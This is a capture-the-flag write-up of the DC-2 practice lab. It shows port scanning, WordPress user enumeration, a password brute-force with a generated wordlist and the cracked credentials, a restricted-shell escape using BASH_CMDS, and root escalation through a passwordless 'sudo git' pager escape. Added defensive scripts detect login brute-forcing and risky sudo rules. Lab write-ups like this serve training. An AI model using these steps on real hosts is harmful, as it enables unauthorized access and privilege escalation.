DC-2

Description
Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.
As with the original DC-1, it’s designed with beginners in mind.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
Just like with DC-1, there are five flags including the final flag.
And again, just like with DC-1, the flags are important for beginners, but not so important for those who have experience.
In short, the only flag that really counts, is the final flag.
For beginners, Google is your friend. Well, apart from all the privacy concerns etc etc.
I haven’t explored all the ways to achieve root, as I scrapped the previous version I had been working on, and started completely fresh apart from the base OS install.

Write-Up

The ifconfig output and the VM setup are as follows:

Scan vmnet1:
hausa@debian:~$ fping -asg 172.16.1.1/24
172.16.1.1
172.16.1.129

Scan 172.16.1.129:
hausa@debian:~$ nmap -Pn 172.16.1.129
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-11 13:15 EDT
Nmap scan report for 172.16.1.129
Host is up (0.0024s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds

Only port 80 is open. Trying to open it in a browser fails.
Run a more detailed scan:
hausa@debian:~$ nmap -p 1-65535 -A 172.16.1.129
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-13 11:54 EDT
Nmap scan report for 172.16.1.129
Host is up (0.0034s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Did not follow redirect to http://dc-2/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Ports 80/http and 7744/ssh are open, and port 80 redirects to http://dc-2/.
After adding an entry for dc-2 to the hosts file, port 80 can be accessed normally.
This gives flag 1:

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
The hint tells us that the usual wordlists probably won't work, so generate one with cewl, brute-force with it, and log in.
hausa@debian:~$ cewl http://dc-2/ -w tempdict.txt
Then enumerate usernames with wpscan.
hausa@debian:~$ wpscan --url http://dc-2 --enumerate u
Three users are found: admin, jerry and tom. Save them to tempusr.txt.
Then brute-force:
hausa@debian:~$ wpscan --url dc-2 -U tempusr.txt -P tempdict.txt
Two hits:
[!] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
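
The brute-force above is noisy on the server side: every guess is a POST to wp-login.php from one address within a short window. As an added example (my own code, not part of this write-up or of WPScan), the following script runs that detection logic over constructed Apache combined-format log lines; the log contents, addresses and thresholds are assumptions.

```python
"""Detect WordPress login brute-forcing in Apache combined-format access logs.

Added example with constructed sample data; not from the DC-2 lab.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache combined format: ip ident user [timestamp] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# WordPress answers a failed login with HTTP 200, so status is not a usable
# signal here; the POST rate to these endpoints is.
LOGIN_PATHS = {"/wp-login.php", "/xmlrpc.php"}


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def find_bruteforce(lines, window=timedelta(seconds=60), threshold=10):
    """Return {ip: peak_count} for IPs that POST to a login endpoint at least
    `threshold` times inside any sliding `window`."""
    attempts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"].split("?")[0] in LOGIN_PATHS:
            attempts[rec["ip"]].append(rec["ts"])

    flagged = {}
    for ip, stamps in attempts.items():
        stamps.sort()
        start, best = 0, 0
        for end in range(len(stamps)):
            # Slide the window start forward until it covers at most `window`.
            while stamps[end] - stamps[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged


def sample_log():
    """Constructed log lines (assumption): one scanner, one normal user, one junk line."""
    base = datetime(2020, 8, 13, 11, 54, 0, tzinfo=timezone.utc)

    def line(ip, offset, method, path, ua):
        ts = (base + timedelta(seconds=offset)).strftime(TS_FMT)
        return (f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" 200 4312 '
                f'"http://dc-2/wp-login.php" "{ua}"')

    lines = [line("10.0.0.5", 2 * i, "POST", "/wp-login.php", "scanner/1.0") for i in range(12)]
    lines.append(line("192.168.1.20", 5, "GET", "/wp-login.php", "Mozilla/5.0"))
    lines.append(line("192.168.1.20", 9, "POST", "/wp-login.php", "Mozilla/5.0"))
    lines.append(line("192.168.1.20", 31, "POST", "/wp-login.php", "Mozilla/5.0"))
    lines.append("this line is not a valid access-log record")
    return lines


if __name__ == "__main__":
    for ip, count in find_bruteforce(sample_log()).items():
        print(f"{ip}: {count} login POSTs within 60s")
```

The threshold and window are tuning knobs: a site whose users routinely mistype passwords needs a higher threshold, while a site that also serves xmlrpc.php should keep that path in the set because it accepts credentials through the same authentication code.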

Try logging in.
Flag 2 is found under jerry's Pages:

If you can’t exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
The hint says: if WordPress can't be exploited, try another way.
Try SSH.
jerry can't log in, but tom can.
ls shows flag3.txt, but cat isn't available; less works. Flag 3:

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
Switching to jerry: the su command isn't available either.
Calling /bin/su directly doesn't work either.
Adding to the environment variables isn't allowed either.
Another command interpreter can be invoked to bypass these restrictions:
After switching to jerry, flag 4 is in jerry's home directory:

Good to see that you’ve made it this far – but you’re not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here – you’re on your own now. 🙂
Go on – git outta here!!!!
Only root is left. sudo -l shows that jerry can run git without a password:
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git
Privilege escalation:
sudo git -p
!/bin/bash

The final flag is then found in root's home directory:

Congratulatons!!!
A special thanks to all those who sent me tweets and provided me with feedback – it’s all greatly appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.

End

Summary

Commands that can be run as root without a password can be used for privilege escalation once they drop into an interactive mode;
BASH_CMDS[a]=/bin/sh;a can bypass some command restrictions, for example before obtaining flag 3:
tom@DC-2:~$ BASH_CMDS[b]=/bin/cat
tom@DC-2:~$ b flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
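
The first point of the summary is what an administrator should be checking for: a NOPASSWD sudo rule for a binary that hands control to a pager is a root shell in disguise. As an added example (my own code, not from this write-up, the DC-2 lab or sudo itself), the script below parses the `sudo -l` output shown earlier, flags such entries, and checks a constructed hardened variant that carries the sudoers NOEXEC tag. The set of pager-capable binaries is a placeholder seeded only with git, the case this write-up demonstrates.

```python
"""Audit `sudo -l` output for NOPASSWD rules that can reach an interactive shell.

Added example; the parser, the hardened sample and PAGER_CAPABLE are assumptions.
"""
import os
import re
from dataclasses import dataclass

# One "(runas) TAG: TAG: /path/cmd args, /path/other" line from `sudo -l`.
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$")

# Placeholder (assumption): binaries that open a pager or editor and so can hand
# the sudo target's privileges to a shell. git is the one shown in the write-up;
# extend from your own policy.
PAGER_CAPABLE = {"git"}

# The jerry@DC-2 output from the write-up, as a raw string so the escaped colons survive.
PAGE_OUTPUT = r"""Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
"""

# Constructed hardened variant: NOEXEC stops git from exec'ing a pager or shell.
HARDENED_OUTPUT = """User jerry may run the following commands on DC-2:
    (root) NOEXEC: NOPASSWD: /usr/bin/git
"""


@dataclass(frozen=True)
class SudoEntry:
    runas: str
    tags: tuple
    command: str


def parse_sudo_l(text):
    """Parse the command section of `sudo -l` output into SudoEntry records."""
    entries = []
    in_commands = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        tags = tuple(t.rstrip(":") for t in m.group("tags").split())
        for cmd in m.group("cmds").split(","):
            entries.append(SudoEntry(m.group("runas").strip(), tags, cmd.strip()))
    return entries


def audit(entries):
    """Return (entry, reason) pairs that a reviewer should look at."""
    findings = []
    for e in entries:
        if "NOPASSWD" not in e.tags:
            continue
        if e.command == "ALL":
            findings.append((e, "passwordless ALL: equivalent to a root shell"))
            continue
        exe = os.path.basename(e.command.split()[0])
        if exe in PAGER_CAPABLE and "NOEXEC" not in e.tags:
            findings.append((e, f"{exe} can spawn a pager or shell; add the NOEXEC tag "
                                "or drop the rule"))
    return findings


if __name__ == "__main__":
    for entry, reason in audit(parse_sudo_l(PAGE_OUTPUT)):
        print(f"({entry.runas}) {' '.join(entry.tags)} {entry.command}: {reason}")
```

Pinning arguments alone (for example allowing only `git log`) does not close this hole, because git pages its output by default; NOEXEC, which makes any exec from the sudo'd process fail, or removing the rule is the fix.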

If you have other insights, please be sure to post them in the comments. Much appreciated!